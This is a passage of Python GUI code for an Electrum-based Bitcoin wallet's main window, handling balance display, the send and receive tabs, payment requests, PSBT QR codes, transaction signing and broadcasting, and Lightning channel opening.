text += " [%s "%(self.format_amount(u, is_diff=True).strip()) + _("unconfirmed") + "]"
if x:
text += " [%s "%(self.format_amount(x, is_diff=True).strip()) + _("unmatured") + "]"
if ai:
text += " [%s "%(self.format_amount(ai, is_diff=True).strip()) + _("Secure incoming") + "]"
if ao:
text += " [%s "%(self.format_amount(ao, is_diff=True).strip()) + _("Secure outgoing") + "]"
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, *, invoice=None, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, invoice=invoice, desc=tx_desc)
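# The PSBT is shrunk (witness UTXOs only, xpubs/bip32 paths stripped) and
# then split into QR-sized pieces. Each piece is prefixed with
# "<chunk_no>;<chunk_count>;" so the scanner can reassemble out-of-order
# scans. Worked example: 2500 bytes of data with max_size = 2000 gives
# chunks_count = 2 and chunk_size = 1251, i.e. "1;2;<bytes 0..1250>" and
# "2;2;<bytes 1251..2499>".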
def show_psbt_qrcode(self, psbt: PartialTransaction, invoice=None):
def minimize_psbt(psbt):
psbt.convert_all_utxos_to_witness_utxos()
psbt.remove_xpubs_and_bip32_paths()
def chop_data(data):
max_size = 2000
if len(data) <= max_size:
return [data]
chunks = []
chunks_count = len(data)//max_size + 1
chunk_size = (len(data)//chunks_count) + 1
for c in range(chunks_count):
# chunk_no ; chunk_count ; chunk_data
chunk = str(c + 1) + ';' + str(chunks_count) + ';'
chunk += data[c*chunk_size:(c+1)*chunk_size]
chunks.append(chunk)
return chunks
minimize_psbt(psbt)
data = psbt.serialize()
chunks = chop_data(data)
description = _('In order to confirm the transaction, scan the QR codes '
'in the "Authenticators" tab in the Gold Wallet app.')
try:
d = PSBTDialog(chunks, self, invoice, description=description)
d.exec_()
except qrcode.exceptions.DataOverflowError:
self.show_error(_('Failed to display QR code.') + '\n' +
_('Transaction is too large in size.'))
except Exception as e:
self.show_error(_('Failed to display QR code.') + '\n' + repr(e))
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Generate'))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice())
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address = ButtonsTextEdit()
self.receive_address.addCopyButton(self.app)
self.receive_address.setReadOnly(True)
self.receive_address.setFocusPolicy(Qt.ClickFocus)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_address, _("Address"))
self.receive_widgets.addTab(self.receive_qr, _("QR Code"))
self.receive_widgets.addTab(self.receive_address_e, "BIP21 URI")
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
self.show_message(_("{title} copied to clipboard:\n\n{content}").format(title=title, content=content))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_address.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.receive_address.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
self.receive_address.setText(addr)
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
self.max_button.setChecked(True)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
tx = make_tx(None)
amount = tx.output_value()  # sum(x.value_sats() for x in self.get_coins())
self.amount_e.setAmount(amount)
## subtract extra fee
#__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
#amount_after_all_fees = amount - x_fee_amount
#self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
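# @protected is a decorator for methods that need the wallet password.
# A minimal usage sketch (hypothetical method name, not from this file):
#
#     @protected
#     def do_something_sensitive(self, arg, password):
#         ...  # `password` is injected by the wrapper, or None if the
#              # wallet is unencrypted
#
# The wrapper keeps prompting until check_password() succeeds, and silently
# returns if the user cancels the dialog.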
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{alias}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias=alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key, status):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices, external_keypairs=None):
outputs = []
for invoice in invoices:
outputs += invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs, external_keypairs=external_keypairs)
def do_pay_invoice(self, invoice, external_keypairs=None):
if invoice['type'] == PR_TYPE_ONCHAIN:
outputs = invoice['outputs']
self.pay_onchain_dialog(self.get_coins(), outputs, invoice=invoice, external_keypairs=external_keypairs)
else:
raise Exception('unknown invoice type')
def get_coins(self, nonlocal_only=False):
coins = self.get_manually_selected_coins()
return coins or self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Sequence[PartialTxInput]:
return self.utxo_list.get_spend_list()
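# pay_onchain_dialog() drives the on-chain send flow: a `make_tx` closure
# (fee estimate -> unsigned tx) feeds either the advanced preview dialog or
# ConfirmTxDialog; on confirmation the tx is signed in a background thread
# and then broadcast (or just shown, if incomplete or offline).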
def pay_onchain_dialog(self, inputs, outputs, invoice=None, external_keypairs=None):
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = False  # was bool(external_keypairs); kept False, since trustedcoin is not used here
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx, outputs, external_keypairs=external_keypairs, invoice=invoice)
return
output_values = [x.value for x in outputs]
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(self, make_tx, output_value, is_sweep)
d.update_tx()
if d.not_enough_funds:
self.show_message(_('Not Enough Funds'))
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx, invoice=invoice)
self.sign_tx_with_password(tx, sign_done, password, external_keypairs)
else:
self.preview_tx_dialog(make_tx, outputs, external_keypairs=external_keypairs, invoice=invoice)
def preview_tx_dialog(self, make_tx, outputs, external_keypairs=None, invoice=None):
d = PreviewTxDialog(make_tx, outputs, external_keypairs, window=self, invoice=invoice)
d.show()
def broadcast_or_show(self, tx, invoice=None):
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx, invoice=invoice)
elif not tx.is_complete():
self.show_transaction(tx, invoice=invoice)
else:
self.broadcast_transaction(tx, invoice=invoice)
@protected
def sign_tx(self, tx, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback, password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if isinstance(self.wallet, ThreeKeysWallet) and self.wallet.is_instant_mode():
task = partial(self.wallet.sign_instant_transaction, tx, password, external_keypairs)
elif external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
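# broadcast_transaction() splits the work across threads: broadcast_thread()
# runs off the GUI thread (network broadcast, labels, BIP70 payment ACK with
# a 20 s timeout), while broadcast_done() runs back on the GUI thread to
# show the result and refresh the invoice list.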
def broadcast_transaction(self, tx: Transaction, *, invoice=None, tx_desc=None):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if tx_desc:
self.wallet.set_label(txid, tx_desc)
if invoice:
self.wallet.set_paid(invoice['id'], txid)
self.wallet.set_label(txid, invoice['message'])
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_confirmed(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
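# Lightning funding helper: mktx_for_open_channel() returns a make_tx
# closure (fee estimate -> funding tx) over non-local coins, so the
# ConfirmTxDialog in open_channel() can re-estimate the transaction while
# the user adjusts the fee, before anything is broadcast.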
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = partial(self.wallet.lnworker.mktx_for_open_channel, coins, funding_sat)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
# however, the user must not be allowed to broadcast early
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(self, make_tx, funding_sat, False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str, funding_tx, funding_sat, push_amt, password)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {number} confirmations').format(number=n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {error_value}').format(error_value=e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_onchain(self, b):
self.is_onchain = b
self.max_button.setEnabled(b)
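# pay_to_URI() prefills the send tab from a BIP21 URI, e.g. (illustrative):
#     bitcoin:<address>?amount=0.01&label=Coffee
# An 'r' parameter, or a signed 'name'/'sig' pair, switches to the BIP70
# payment-request flow (fields are frozen until the request is fetched).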
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {address} from your wallet?").format(address=addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {labels} from your list of contacts?")
.format(labels=" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error(_('Cannot find payment request in wallet.'))
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
